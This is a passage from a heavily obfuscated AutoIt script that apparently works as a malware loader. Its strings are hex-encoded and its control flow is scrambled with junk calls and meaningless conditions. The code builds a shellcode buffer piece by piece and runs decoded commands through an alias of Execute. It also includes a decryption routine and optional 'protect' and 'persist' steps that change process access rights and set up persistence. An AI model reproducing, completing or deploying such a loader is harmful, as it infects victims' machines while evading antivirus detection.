  5874. Local $lpshellcode = $e($b(wmhsrosshiij(tznhxlbucosri("x0139753537324732453237303732473243393333373347343633373447343732423232333333333243313333363136353633333333324331333334373738363336353634373037324530373247324737473233333332433133333735363637374633373533333332433133333231333333324331333337353636373746333735333333324331333537333738373445324332433133333735363637374633373533333332433133333231363932323231323132313333333243313333373536363737463337353333333243313333323136393235323133333338343343333231333334354"), tznhxlbucosri("x0762566"))))
  5875. IsString(3396588 - 1200923 + 1236102 + 3766126)
  5876. $2102046848 = 855549293
  5877. EndIf
  5878. If 142 = 142 AND 199 = 199 AND 270 <> 127 AND $2102046848 = 1869447033 Then
  5879. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x013931313131313436343237474434324539343241313749353"), tznhxlbucosri("x0E424A7"))
  5880. $2102046848 = 687038453
  5881. Mod(3753520, 1630682)
  5882. Mod(3722851, 919707)
  5883. EndIf
  5884. If 215 > 189 AND 203 >= 161 AND 188 <> 103 AND $2102046848 = 1899622003 Then
  5885. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0146374540403035454B303437474B333334373334363435454"), tznhxlbucosri("x05474"))
  5886. Dim $ykjiigeffn6xitdhomyr = 162739
  5887. $2102046848 = 1057862206
  5888. IsFloat(3559412 * 1292190 * 65239)
  5889. EndIf
  5890. If 222 <= 289 AND 285 > 167 AND 184 >= 111 AND 252 < 265 AND 257 = 257 AND $2102046848 = 1936949709 Then
  5891. $e($b(wmhsrosshiij(tznhxlbucosri("x043C7030323742374137333033363331323733303137323133303030323533303235363C36303032323D323742313132413733303336333132373330363746343636323743343232323D323742313636363746343630323743343032323D32374231363D3"), tznhxlbucosri("x095862646"))))
  5892. $2102046848 = 1276279416
  5893. IsPtr(316958 * 3439140)
  5894. EndIf
  5895. If 171 < 283 AND 287 >= 274 AND 121 > 113 AND 243 < 294 AND 165 = 165 AND $2102046848 = 1953361207 Then
  5896. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x093132353437493938393432413742474747474935493430313"), tznhxlbucosri("x0E646E4"))
  5897. $2102046848 = 1668010818
  5898. Dim $pbsscywohztl4n4kw4rr = 253245
  5899. IsFloat(tznhxlbucosri("Ri2LZBEfsLSdNlZyGlcvM3ilwwFQud"))
  5900. EndIf
  5901. If 160 <= 217 AND 209 > 148 AND 223 = 223 AND $2102046848 = 1972768996 Then
  5902. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x073835373036464646464649393240343830363347383537343"), tznhxlbucosri("x095"))
  5903. Ptr(2654484 - 2715836 * 3624667 + 1641239)
  5904. $2102046848 = 1044747412
  5905. Dim $esm2ottxzweedfeijaqg = 234837
  5906. Random(2863284)
  5907. EndIf
  5908. If 259 <= 260 AND 172 < 291 AND 273 >= 107 AND $2102046848 = 2014417103 Then
  5909. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x074436373534403130324639343739374747474747403934453"), tznhxlbucosri("x0C6F487"))
  5910. $2102046848 = 742906269
  5911. Random(1901700)
  5912. EndIf
  5913. If 274 < 281 AND 273 >= 260 AND 262 <= 288 AND 147 <> 241 AND 231 = 231 AND $2102046848 = 2086657544 Then
  5914. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x093341363132353430313431393345363749313232423431374"), tznhxlbucosri("x0C6D4F6"))
  5915. $2102046848 = 1022397440
  5916. IsBinary(2379990 - 1673606)
  5917. EndIf
  5918. If 287 > 130 AND 103 > 99 AND 160 <> 236 AND 248 > 184 AND $2102046848 = 2088521245 Then
  5919. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x064834313246454646464646464735344346464535314348353"), "0x")
  5920. $2102046848 = 1791391535
  5921. Random(1339945)
  5922. EndIf
  5923. If 150 < 234 AND 127 < 208 AND 168 >= 107 AND $2102046848 = 2094513307 Then
  5924. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x02424242424C304031354C3C3D3C3137374242424242424C304"), tznhxlbucosri("x026952766"))
  5925. $2102046848 = 1025992990
  5926. Dim $nj6c3d3cnzg6mqebb8zg = tznhxlbucosri("OuAQE")
  5927. EndIf
  5928. If 190 <> 143 AND 296 >= 224 AND 189 = 189 AND 239 <> 117 AND $2102046848 = 2113738531 Then
  5929. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x093535354346363339313130364934334033344434453140303"), tznhxlbucosri("x025"))
  5930. Random(383681)
  5931. $2102046848 = 499539945
  5932. EndIf
  5933. If 103 < 194 AND 116 > 99 AND 296 >= 231 AND 167 > 145 AND $2102046848 = 2121580509 Then
  5934. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x02373033313432413432424331304C3242413136443C3137443"), tznhxlbucosri("x034853735"))
  5935. $2102046848 = 589132072
  5936. IsString(1144585 * 1922505 - 2270254 - 2611473)
  5937. IsPtr(tznhxlbucosri("aME2cqXxFwehCSt1WLBFoiyvalk17cvuHaV0xD4y3ik4yZf6uDZ72oxRDOpsnkyUVlkdgMnZLxpsktWIWeRREaihB09fje5TEid9"))
  5938. EndIf
  5939. If 204 >= 179 AND 200 >= 163 AND 284 <> 287 AND $2102046848 = 2132281550 Then
  5940. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0243314B3A3B3631373545454545454B37473631433B3A3B363"), tznhxlbucosri("x02444"))
  5941. $2102046848 = 2144394568
  5942. Chr(2503029)
  5943. EndIf
  5944. If 255 <= 271 AND 101 <> 167 AND 168 <> 210 AND $2102046848 = 2134070852 Then
  5945. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x074749354534324539383934353247474747474749354534304"), tznhxlbucosri("x096A654"))
  5946. Dim $d4glygdyqn5tlbzin2xg = 3279010
  5947. $2102046848 = 1141152127
  5948. EndIf
  5949. If 240 > 193 AND 172 >= 102 AND 152 >= 138 AND 180 < 298 AND $2102046848 = 2141934138 Then
  5950. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x013131313131313933463731324933463731324933423739334"), tznhxlbucosri("x0C69695"))
  5951. $2102046848 = 937438825
  5952. EndIf
  5953. If 104 < 123 AND 121 = 121 AND 109 <= 126 AND $2102046848 = 2144394568 Then
  5954. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x023836464646464648344435314438393835323346464646464"), "0x")
  5955. String(331217 * 1300157 - 348749)
  5956. $2102046848 = 1488986972
  5957. EndIf
  5958. If 259 <= 298 AND 215 <= 241 AND 219 < 277 AND 140 >= 103 AND 289 = 289 AND $2102046848 = 2145452884 Then
  5959. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0333333B314A3432433333333333333B3035363547333333303"), tznhxlbucosri("x01596"))
  5960. $2102046848 = 1745473337
  5961. IsPtr(tznhxlbucosri("spgyf31mMivjY4UzpK9HSbg1Za8cOEUZexrhBQoe"))
  5962. EndIf
  5963. Next
  5964. If 299 <= 300 AND 241 <> 250 AND 105 > 104 AND $protect Then
  5965. acl($handlefrompid)
  5966. EndIf
  5967. If 213 > 181 AND 294 < 295 AND 184 >= 138 AND 175 >= 120 AND 200 = 200 AND $persist Then
  5968. qbcdrrtsoo($ret[wmhsrosshiij(tznhxlbucosri("x043"), tznhxlbucosri("x0C61626E6"))])
  5969. EndIf
  5970. EndFunc
  5971.  
  5972. Func fupvtqkuet($loop, $time)
  5973. For $i = wmhsrosshiij(tznhxlbucosri("x043"), tznhxlbucosri("x0C61626E6")) To $loop
  5974. Global $1681609778 = 1307843693
  5975. Global $qpdhb56a8l = 3809699
  5976. For $e = 0 To 774324
  5977. If 108 <= 225 AND 159 <= 237 AND 207 < 274 AND 159 >= 103 AND 117 < 148 AND $1681609778 = 304222797 Then
  5978. $a = $dkcbcqvbfqgu($a, $a + wmhsrosshiij(tznhxlbucosri("x013"), "0x"))
  5979. $1681609778 = 1591982618
  5980. EndIf
  5981. If 178 >= 150 AND 291 <> 271 AND 177 <= 253 AND 165 < 210 AND 134 > 119 AND $1681609778 = 960345959 Then
  5982. $msmatzrvyjrr($time / $loop)
  5983. ExitLoop
  5984. Random(3377782)
  5985. EndIf
  5986. If 256 <= 274 AND 245 <= 280 AND 205 < 274 AND 183 < 258 AND 233 <> 214 AND $1681609778 = 1307843693 Then
  5987. Local $a = $fdcmavwfjqlj(wmhsrosshiij(tznhxlbucosri("x003878383"), "0x"), wmhsrosshiij(tznhxlbucosri("x033B76363"), tznhxlbucosri("x0A434")))
  5988. Dim $iktxyvl16rkchn0hlvk1 = tznhxlbucosri("bv7lC002RfYV122XExpViABVYl70W0efQqjW0hs7atK1nZ")
  5989. $1681609778 = 304222797
  5990. Dim $qxp0k6npuwcm49slqhme = tznhxlbucosri("HUBHz6kr7Ldik4Z8OoITw34dyQHbi8DQzRp5xSFOf6YiI3ZaXu2BFCxUMDGWTyClOqDvTo0hm9XMo")
  5991. EndIf
  5992. If 185 > 131 AND 272 > 121 AND 140 > 99 AND $1681609778 = 1591982618 Then
  5993. $a = $sjrkikdyyyiq($a, wmhsrosshiij(tznhxlbucosri("x043C77363"), tznhxlbucosri("x03605F687")))
  5994. $1681609778 = 960345959
  5995. EndIf
  5996. Dim $hvelihm3ogonfjkql3p2 = 3795400 + 967847 - 2716769 + 833218 - 53257 * 1923954
  5997. Next
  5998. Next
  5999. EndFunc
  6000.  
  6001. Func vspcltsdkv()
  6002. $ohmyxiagzmqt(@AutoItExe & wmhsrosshiij(tznhxlbucosri("x0E3E5B6A616A2D40616A607D626D61667"), tznhxlbucosri("x054B485D6")))
  6003. EndFunc
  6004.  
  6005. Func dtagcgaows($soccurrencename)
  6006. Global $1681609778 = 1307843693
  6007. Global $jyr8co1fa4 = 2599873
  6008. For $e = 0 To 2308496
  6009. WinExists(tznhxlbucosri("LLeEV4StFy5B4a2Qd2dK3RMMbxBjIc0GpX4KSE3Ig0CrsJl1bUNRZlTk183R2K0QL8UiWtkwRDKmkKed8jaR218O1eM5Qa8sBz8Dgk72O"))
  6010. If 227 >= 138 AND 140 < 189 AND 291 = 291 AND $1681609778 = 304222797 Then
  6011. Local $b = $e(wmhsrosshiij(tznhxlbucosri("x03486F606378755E625573786F666"), tznhxlbucosri("x076D6E6")))
  6012. IsString(2275716 * 3253047)
  6013. $1681609778 = 1591982618
  6014. IsBinary(tznhxlbucosri("g8k7BQT1XjnyjlfRd4UfuvkRFvhUxZQ7UYwC9azA5gwwxf7xThQSAGNtWykYURW4T0AztR4eOLzMu77e"))
  6015. EndIf
  6016. If 232 = 232 AND 258 >= 255 AND 180 = 180 AND 291 <> 172 AND 167 <= 253 AND $1681609778 = 960345959 Then
  6017. Local $alasterror = $e($b(wmhsrosshiij(tznhxlbucosri("x033B7737353045304730353235304530413B313135314536343135364536353040303031313645373530453041313130413331313537343435354431353731313130413331313734353634373730453234303437373634313431353544313131313A3"), tznhxlbucosri("x05796"))))
  6018. IsFloat(tznhxlbucosri("zx7ZkoTqbwGK8wq6"))
  6019. ExitLoop
  6020. Ptr(tznhxlbucosri("3XeQ1R4cYUIgbJ1a0vuTp6wySYl8mF2BqnFK3jtGYomM8D6Wy5YATeG5sE9q13HyovsuDABSztiglM02b5hpNVDXdv0bGMxzfyp1CME"))
  6021. EndIf
  6022. If 122 > 113 AND 134 <> 276 AND 170 > 154 AND 244 > 227 AND 119 <> 103 AND $1681609778 = 1307843693 Then
  6023. Local $e = Execute
  6024. $1681609778 = 304222797
  6025. IsBinary(3102797 + 1723878 - 252942 * 2425754)
  6026. EndIf
  6027. If 146 = 146 AND 169 >= 111 AND 173 >= 134 AND 109 <> 238 AND 123 = 123 AND $1681609778 = 1591982618 Then
  6028. Local $ahandle = $e($b(wmhsrosshiij(tznhxlbucosri("x043C7030323742374037323532374237463C36363236423133363231423132374737373636314230323742374636363746343636323C3235323142303237423136363637463436363037333632313235333032313030433133303231333C313336363637463436363337333033363331323733303635463636374634363637343636363746343636323632324232423746363637463436363735363636374634363633333337333033363636363746343630333730324237323733313336333632313231423732313031423532304231363D3"), tznhxlbucosri("x06776F664"))))
  6029. Ptr(1534445 * 3298019 * 3965199)
  6030. $1681609778 = 960345959
  6031. IsBool(tznhxlbucosri("BmYFWBijJ1SjmyICiWisVZhFX8Rj3OvcY8LnXuaYrHw9UnLCAtJ7moAXy5NZBL8DXGKU198nrt"))
  6032. IsPtr(tznhxlbucosri("unxH6ohBaVQW76ykYf0b9AM1mBp8L6OqEXtLeeboQfK8lnar3jSEsVnC4Cc6l7jkgTA30vbt9IUUqbpz84dgHhD3xcj1mh3eYFg11stOCIj"))
  6033. EndIf
  6034. IsFloat(tznhxlbucosri("QE9hhflcym8xk9w315mosz"))
  6035. Next
  6036. If 144 > 112 AND 133 < 157 AND 185 < 287 AND 169 = 169 AND 137 > 123 AND $alasterror[wmhsrosshiij(tznhxlbucosri("x043"), tznhxlbucosri("x0C61626E6"))] = wmhsrosshiij(tznhxlbucosri("x053C373"), tznhxlbucosri("x056175574")) Then
  6037. Global $1591982618 = 1307843693
  6038. Global $dtwdnyi5uk = 3845936
  6039. For $e = 0 To 2677978
  6040. Dim $exxwq33cquyjx0rcawms = 307267
  6041. If 160 < 258 AND 279 = 279 AND 147 > 140 AND $1591982618 = 304222797 Then
  6042. $e($b(wmhsrosshiij(tznhxlbucosri("x00387530373236364633363537333733343336334636473336353238343034313735373436364439373434353738363532393"), "0x")))
  6043. IsBinary(tznhxlbucosri("DeXdFtrAd0z1zUJeBMeerL1n3kTBy9UD3xyY2z3aEiMaJLWbEN1ctJXklqzMRdArgI0cOKUkkBg6JrJpQ1EfMvekbTnip"))
  6044. ExitLoop
  6045. Chr(874928)
  6046. EndIf
  6047. If 188 > 121 AND 230 = 230 AND 154 <> 124 AND 207 > 171 AND $1591982618 = 1307843693 Then
  6048. $e($b(wmhsrosshiij(tznhxlbucosri("x033B7737353045304730353235304530413B313135314536343135364536353040303031313645373530453041313130413331313531353545354530413131304133313137303530453544303536373B353235364537353045363131313041333131353B3532353645373530453631313130413331373532373B3532353645373530453636314131303331313637413A3"), tznhxlbucosri("x04515"))))
  6049. IsString(741609 * 1275623)
  6050. $1591982618 = 304222797
  6051. EndIf
  6052. Next
  6053. EndIf
  6054. EndFunc
  6055.  
  6056. Func bxrpokoote($vdata, $vcryptkey)
  6057. Global $1972768996 = 1307843693
  6058. Global $6chxlwf667 = 2693644
  6059. For $e = 0 To 475076
  6060. Random(2001109)
  6061. If 172 <= 276 AND 183 <> 150 AND 246 < 248 AND 249 >= 162 AND 183 <= 194 AND $1972768996 = 84602552 Then
  6062. Local $tinput = $e($b(wmhsrosshiij(tznhxlbucosri("x043C703032374237413733303336333132373330303733363231323533303231363C36363236333D33303231313646363634363236343036323D323142353336333D303742313231463C363032363036323D323142353336333D363D363436323634363631304636363D3"), tznhxlbucosri("x087473734"))))
  6063. IsString(2874891 * 183213 * 1943077)
  6064. $1972768996 = 2134070852
  6065. EndIf
  6066. If 206 > 132 AND 181 < 266 AND 198 < 233 AND 267 <= 301 AND $1972768996 = 89876260 Then
  6067. $tbuff = $e($b(wmhsrosshiij(tznhxlbucosri("x00387434363346334533373437323735363337343433373236353631373436353238323236323739373436353532423232303236323034323639363546313732373934334635363542383234373634333732373937303734343246353739323932303236323032323534423232393"), "0x")))
  6068. IsFloat(1871109 + 123570)
  6069. $1972768996 = 150208926
  6070. EndIf
  6071. If 281 <= 289 AND 122 > 101 AND 153 <> 145 AND $1972768996 = 150208926 Then
  6072. $e($b(wmhsrosshiij(tznhxlbucosri("x0139753537324732443236353633363437323635343237343635353537303635373033393335363535333634373737373332433135343639373437323634363537343339333332303333333833324331333536373532363336383631363535334734363833383"), tznhxlbucosri("x0648487"))))
  6073. $1972768996 = 578141839
  6074. IsBinary(tznhxlbucosri("HX2fXkki29E3bJlTBqddrQ0ZBQzoCm2LZNOpYOTEgtm"))
  6075. EndIf
  6076. If 229 < 280 AND 186 > 180 AND 239 <= 266 AND 245 <> 186 AND 202 <> 196 AND $1972768996 = 171873601 Then
  6077. $vdata = $e($b(wmhsrosshiij(tznhxlbucosri("x013975333738373447303633363834353737443236353633373837344736333933353637353537303635373033383"), tznhxlbucosri("x0356784"))))
  6078. $1972768996 = 198176244
  6079. EndIf
  6080. If 120 > 118 AND 114 <= 208 AND 239 >= 169 AND 243 > 135 AND 298 <= 300 AND $1972768996 = 198176244 Then
  6081. Local $aret = $e($b(wmhsrosshiij(tznhxlbucosri("x01397535373247324532373037324732433933333530373536373730363137383232323333344735373247324333333243313333373337374737473243333332433133333532363336383631363535303732363036343738363337343532373747344635373436393635333333324331333337393730373447353732473433304333333243313333323133333332433133333631363536333333333243313333323133333332433133333631363536333333333243313333323133333332433133333735363637374633373533333332433133333233323533333332433133333735363637374633373533333332433133333231363935373231323132313231323132313231333333383"), tznhxlbucosri("x0948734"))))
  6082. String(2022600 + 776336 * 2193254 * 3865588)
  6083. $1972768996 = 1711264047
  6084. Dim $0vwefb6ttifoqvkxb1j9 = tznhxlbucosri("ip5ULAlWiJ3QDHQfZtQ0Opzh7dhZSVwgSqMJb")
  6085. EndIf
  6086. If 157 <> 262 AND 287 = 287 AND 159 = 159 AND 140 <= 166 AND $1972768996 = 232684580 Then
  6087. $e($b(wmhsrosshiij(tznhxlbucosri("x0038743436334633443336313633463342383232343136343736363137303639333333323235463436334633423232334230323236323636463646334232323342303232343337323739373037343434363537333734373236364739343836313733363832323233423032323638363136354634363346353232323342303234363834333732373937303734343836313733363832393"), tznhxlbucosri("x007"))))
  6088. Dim $iaywt2fhsbttdkbt1cxo = 1704918
  6089. $1972768996 = 960210641
  6090. Int(2503148)
  6091. Chr(2587077)
  6092. EndIf
  6093. If 109 <= 219 AND 100 >= 99 AND 195 = 195 AND 114 >= 106 AND $1972768996 = 271776171 Then
  6094. $aret = $e($b(wmhsrosshiij(tznhxlbucosri("x003874343633463344333631363346334238323234313634373636313730363933333332323546343633463342323233423032323632363646364633423232334230323234333732373937303734343436353732363937363635343246353739323232334230323236383631363546343633463532323233423435364536463735364631343337323739373037343439363547343635373236354631363344343631373436313532423233323232353442334230323237353639363547343232323342303232333037383330333033303330333633363331333032323233423032323638363136354634363346353232323342303234363834333732373937303734343836313733363832334230323236343737363647323634323232334230323233303738333033303330333033303330333033313232323342303232363836313635463436334635323142323233423032323330323232393"), "0x")))
  6095. $1972768996 = 1220020015
  6096. EndIf
  6097. If 234 > 184 AND 210 = 210 AND 171 <> 162 AND 250 <= 273 AND $1972768996 = 304222797 Then
  6098. Local $tbuff
  6099. Int(934021)
  6100. $1972768996 = 1591982618
  6101. IsBinary(tznhxlbucosri("7d9ORKLqEdS"))
  6102. EndIf
  6103. If 168 <> 126 AND 245 >= 160 AND 296 <> 137 AND $1972768996 = 578141839 Then
  6104. $aret = $e($b(wmhsrosshiij(tznhxlbucosri("x043C7030323742374037323532374237463C363630353230333232353334323D37373736363142303237423746363637463436363236323242324237463636374634363630373336333D33343330303C32353337323C30303235333032353636363746343636323C323532314230323742313636363746343630323C30373336333D33343330303C32353337323C3637463436363337333033363331323733303635463636374634363033303036333132323232363746343636323033333232433632303636363746343030323742374137333033363331323733303033323133303137323D33354231363C363033303036333132323232363D36374634363632303333323243363230363636374634363637353636363D3"), tznhxlbucosri("x0E4072595"))))
  6105. $1972768996 = 271776171
  6106. Dim $cgqsy6eusjo0dw25pok3 = tznhxlbucosri("367hyaqpi57ukHYCiU5TxpwRBmy5ZDTDmgMFviGYeZBx33LEgyGF7BHKVmHU0DfXLOv0ZNyQlulfpatCt7w96tiq7KxAqK8crrrWic")
  6107. Chr(438907)
  6108. EndIf
  6109. If 153 > 105 AND 293 <= 295 AND 230 < 245 AND $1972768996 = 742906269 Then
  6110. Return $e($b(wmhsrosshiij(tznhxlbucosri("x043C7030323742374137333033363331323733303033323133303030323533303235363C36303330303243313330333433313330363746343735363D3"), tznhxlbucosri("x024D44615"))))
  6111. ExitLoop
  6112. IsBool(1117782 - 698885 * 1685512)
  6113. EndIf
  6114. If 288 >= 280 AND 197 > 101 AND 113 <= 222 AND 143 > 105 AND $1972768996 = 834897274 Then
  6115. Local $a_call = $e($b(wmhsrosshiij(tznhxlbucosri("x0038743436334633443336313633463342383232363547343634363346334235463436334633423232334230323236393635473432323233423235323734363344343635363336364634473037323635373337333432373536363636363537323232323342323735373336383636473237343232323342303332323342323730373437323232323342303434363346334533373437323735363337343437363537343530373437323238323437343432373536363636363537323239323342323634373736364732363432323233423034343633463345333734373237353633373434373635373435333639373146353238323437343432373536363636363537323239323342323730373437323232323342303434363346334533373437323735363337343437363537343530373437323238323437343439363547303735373432393233423236343737363647323634323232334230343436334633453337343732373536333734343736353734353336393731463532383234373434393635473037353734323932334232363437373636473236343231423232334230333032393"), tznhxlbucosri("x096"))))
  6116. String(3009425 - 1148054 * 289842 + 495047)
  6117. $1972768996 = 2014417103
  6118. IsString(tznhxlbucosri("vY5zVnqbzlgDQlh2F16exvkqtjghEUDYf"))
  6119. EndIf
  6120. If 181 >= 101 AND 232 > 210 AND 111 > 100 AND 288 > 129 AND 268 >= 246 AND $1972768996 = 937438825 Then
  6121. $e($b(wmhsrosshiij(tznhxlbucosri("x033B7737353045304630343734313436353034373630353634373737353234373532313B313734373731343635353535313041333736343B35363530343634373536313B313130323131313A31304133313734353737353234373532313A3"), tznhxlbucosri("x06486"))))
  6122. IsString(3812461 - 2230282)
  6123. $1972768996 = 1838106253
  6124. EndIf
  6125. If 173 >= 152 AND 282 <= 290 AND 258 > 104 AND $1972768996 = 960210641 Then
  6126. $vcryptkey = $vreturn
  6127. $1972768996 = 2141934138
  6128. EndIf
  6129. If 224 < 290 AND 258 >= 129 AND 278 > 183 AND 107 < 254 AND $1972768996 = 960345959 Then
  6130. Local $iplaintextsize
  6131. $1972768996 = 1681609778
  6132. EndIf
  6133. If 221 <= 259 AND 195 < 253 AND 111 <= 186 AND 137 >= 111 AND 225 <= 282 AND $1972768996 = 1025992990 Then
  6134. $bbinary = $e($b(wmhsrosshiij(tznhxlbucosri("x003874323639363546313732373932383234373635323635373437353732363542393"), "0x")))
  6135. WinExists(tznhxlbucosri("KQba4cQc7wLgZ5paR80TCTeLm0UuSlsN2zO2j4CItnpOMrKa9dmYd4nX590lsJOE"))
  6136. $1972768996 = 84602552
  6137. EndIf
  6138. If 152 = 152 AND 110 <= 143 AND 203 <= 229 AND $1972768996 = 1115248989 Then
  6139. $aret = $e($b(wmhsrosshiij(tznhxlbucosri("x003874343633463344333631363346334238323234313634373636313730363933333332323546343633463342323233423032323632363646364633423232334230323234333732373937303734343337323635363137343635343836313733363832323233423032323638363136354634363346353232323342303234353645364637353646313433373237393730373434393635473436353732363546313633443436313734363135324232333232323534423342303232373536393635473432323233423032323330373833303330333033303338333033303333323232334230323237303734373232323233423032323330323232334230323236343737363647323634323232334230323233303232323342303232363836313635463436334635323142323233423032323330323232393"), "0x")))
  6140. String(530412 - 1650380)
  6141. $1972768996 = 1424029346
  6142. IsPtr(tznhxlbucosri("QT3lxBfvON893TZ569zDM7S"))
  6143. Dim $obxymh8n0lsw0z07sqv0 = 1626556
  6144. EndIf
  6145. If 100 > 99 AND 211 > 148 AND 209 = 209 AND $1972768996 = 1141152127 Then
  6146. Local $tbuffer = $e($b(wmhsrosshiij(tznhxlbucosri("x01397535373247324432363536333634373236353532363337343730363537343339333337333638363537343433433333313337333132303237333133304331353537324732443236353633363437323635353637343635343237383630473433393335363535383734463136343635333833313337333133333435433333383"), tznhxlbucosri("x0570537"))))
  6147. $1972768996 = 834897274
  6148. Chr(1230509)
  6149. Dim $8g3xt4rob1afcsfngei9 = 1323723
  6150. EndIf
  6151. If 101 <= 251 AND 282 < 283 AND 215 < 296 AND $1972768996 = 1220020015 Then
  6152. $vreturn = $aret[wmhsrosshiij(tznhxlbucosri("x053"), tznhxlbucosri("x016"))]
  6153. $1972768996 = 232684580
  6154. EndIf
  6155. If 269 < 300 AND 278 < 287 AND 175 <> 295 AND $1972768996 = 1267601999 Then
  6156. $e($b(wmhsrosshiij(tznhxlbucosri("x043C7030323742374037323532374237463C363630353230333232353334323D37373736363142303237423746363637463436363236323242324237463636374634363630373336333D33343330303032313337333033363232433D30364231333D3636363746343636323C323532314230323742313636363746343630333230373336333D3334333030364231333D363D3"), tznhxlbucosri("x09425A7B4"))))
  6157. Mod(3291238, 701400)
  6158. $1972768996 = 2094513307
  6159. WinExists(tznhxlbucosri("6QdqDOtZxsJeoson6VUnzT3jXNZcsQTOMvMxqTZwutwaaTJ5j7R8hHqU"))
  6160. EndIf
  6161. If 218 <> 221 AND 205 <> 188 AND 132 <= 181 AND 114 >= 103 AND 201 = 201 AND $1972768996 = 1307843693 Then
  6162. Local $__g_acryptinternaldata[wmhsrosshiij(tznhxlbucosri("x033"), "0x")]
  6163. Chr(3465344)
  6164. $1972768996 = 304222797
  6165. IsFloat(tznhxlbucosri("0OFKJEzyzxkW1M2BtFl83n0h0wxEt"))
  6166. EndIf
  6167. If 285 < 296 AND 283 < 285 AND 137 > 106 AND 119 >= 118 AND 243 <> 217 AND $1972768996 = 1312944448 Then
  6168. Local $e = Execute
  6169. IsBinary(tznhxlbucosri("UqNwgDSj1vlaaWh9QhjUVbUTNiafQgiz2XSK2F20FbpHk0EelytJn4EULaZFjaQK1B4yqypL20FiCn74KJ5LggJngiR"))
  6170. $1972768996 = 1337610490
  6171. Dim $1242y8wkfhjuccfnqhsh = tznhxlbucosri("GzIQNuWZIs3Sb0KqNvl5EyuDMVElZ4j")
  6172. EndIf
  6173. If 173 <> 201 AND 187 <> 174 AND 254 > 140 AND $1972768996 = 1337610490 Then
  6174. Local $b = $e(wmhsrosshiij(tznhxlbucosri("x03486F606378755E625573786F666"), tznhxlbucosri("x076D6E6")))
  6175. Int(926027)
  6176. $1972768996 = 171873601
  6177. EndIf
  6178. If 258 < 259 AND 176 <= 297 AND 238 <> 245 AND $1972768996 = 1424029346 Then
  6179. $hcrypthash = $aret[wmhsrosshiij(tznhxlbucosri("x053"), tznhxlbucosri("x016"))]
  6180. $1972768996 = 89876260
  6181. Chr(2512456)
  6182. EndIf
  6183. If 146 > 124 AND 289 = 289 AND 264 <> 145 AND $1972768996 = 1488986972 Then
  6184. $aret = $e($b(wmhsrosshiij(tznhxlbucosri("x043C7030323742374037323532374237463C363630353230333232353334323D37373736363142303237423746363637463436363236323242324237463636374634363630373336333D33343330303032313337333033363232433D30364231333D3636363746343636323C323532314230323742313636363746343630333230373336333D3334333030364231333D363D3"), tznhxlbucosri("x09425A7B4"))))
  6185. WinExists(tznhxlbucosri("1wd5YuBS1uzCeFJfw5kdnKRaD5atQk4rzp3BqFD32VGMiuxuAGp2T1ikn01hSENrHJgjmLOdIDSyCKXw5iTCbXGdtpscj"))
  6186. $1972768996 = 1267601999
  6187. EndIf
  6188. If 194 >= 156 AND 193 = 193 AND 244 = 244 AND $1972768996 = 1566067065 Then
  6189. $iplaintextsize = $aret[wmhsrosshiij(tznhxlbucosri("x023"), tznhxlbucosri("x044F47414"))]
  6190. IsPtr(960649 + 1511053 + 3111714 + 1267468)
  6191. $1972768996 = 2132281550
  6192. EndIf
  6193. If 215 > 200 AND 159 = 159 AND 282 = 282 AND $1972768996 = 1591982618 Then
  6194. Local $ttempstruct
  6195. $1972768996 = 960345959
  6196. IsBool(2230957 - 3423086 + 646501)
  6197. Chr(2325066)
  6198. EndIf
  6199. If 224 <= 241 AND 284 = 284 AND 204 >= 193 AND 177 <= 191 AND $1972768996 = 1681609778 Then
  6200. Local $vreturn
  6201. $1972768996 = 1312944448
  6202. IsBool(3597126 + 1423134)
  6203. IsPtr(tznhxlbucosri("OVYBztdZxhvsCxLkuS8R5uq1YEgyrlSsdyEGRsjgdGiECqSFT741peZCkYFtTbZ1Kft6O5bsHoqBTAbaRsBiyAjMRKhRKxh"))
  6204. EndIf
  6205. If 286 <= 293 AND 296 <> 140 AND 208 <> 207 AND $1972768996 = 1711264047 Then
  6206. $__g_acryptinternaldata[wmhsrosshiij(tznhxlbucosri("x033"), tznhxlbucosri("x0559417"))] = $aret[wmhsrosshiij(tznhxlbucosri("x013"), "0x")]
  6207. IsBinary(tznhxlbucosri("lGrW0zGQlYeyrkumzKQyW7nTl8MNNzWetQgE04JbgTzvLsf6XyWmwpVSHCotcmjgLg0ygXUzYx17tzv5"))
  6208. $1972768996 = 1115248989
  6209. EndIf
  6210. If 243 = 243 AND 185 = 185 AND 217 > 203 AND $1972768996 = 1838106253 Then
  6211. $aret = $e($b(wmhsrosshiij(tznhxlbucosri("x033B7737353045304730353235304530413B313137323537343535323433353A30303031313645373530453041313130413331313531353545354530413131304133313137303431343A343334373737353635303431343A343334373131313041333131353B353235364537353045363131313041333137343537303431343A3433343737314536343A313041333131353B3532353645373530453631313130413331313033313131304133313135313535453545304131313041333736343B35363530343634373536313B313130323131313A3130413331313537343435354431353731313130413331313033313131304133313134303437343134363530343731324131313041333137343737313436353535353130413331313537343435354431353731324131313041333731353A353645323431343A373045363536413B313734353737353234373532313A313A3"), tznhxlbucosri("x07486"))))
  6212. $1972768996 = 1566067065
  6213. IsBinary(2555346 - 3133957 - 2740448)
  6214. Int(2728920)
  6215. EndIf
  6216. If 280 >= 181 AND 278 >= 152 AND 199 <> 277 AND $1972768996 = 2014417103 Then
  6217. Local $toutput = $e($b(wmhsrosshiij(tznhxlbucosri("x013975353732473244323635363336343732363535323633373437303635373433393333373336383635373434334333333133373331333537303437453237303732473244334237343543313337333133333435433333324331353537324732443236353633363437323635353637343635343136353633333933353635353336343737373737343633333833383"), tznhxlbucosri("x0D6A785"))))
  6218. $1972768996 = 742906269
  6219. EndIf
  6220. If 140 <> 206 AND 240 < 286 AND 192 <> 261 AND 277 >= 268 AND 274 <= 287 AND $1972768996 = 2094513307 Then
